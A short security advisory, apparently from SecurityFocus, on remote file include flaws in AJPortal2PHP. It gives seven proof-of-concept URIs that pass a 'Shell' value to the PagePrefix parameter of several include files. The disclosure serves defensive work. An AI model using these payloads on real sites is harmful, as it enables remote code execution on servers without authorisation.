AJPortal2PHP Multiple Remote File Include Vulnerabilities

Attackers can use a browser to exploit these issues.

The following proof-of-concept URIs are available:

http://www.example.com/includes/begin.inc.php?PagePrefix=Shell
http://www.example.com/includes/connection.inc.php?PagePrefix=Shell
http://www.example.com/includes/events.inc.php?PagePrefix=Shell
http://www.example.com/includes/footer.inc.php?PagePrefix=Shell
http://www.example.com/includes/header.inc.php?PagePrefix=Shell
http://www.example.com/includes/menuleft.inc.php?PagePrefix=Shell
http://www.example.com/includes/pages.inc.php?PagePrefix=Shell


 

Privacy Statement
Copyright 2010, SecurityFocus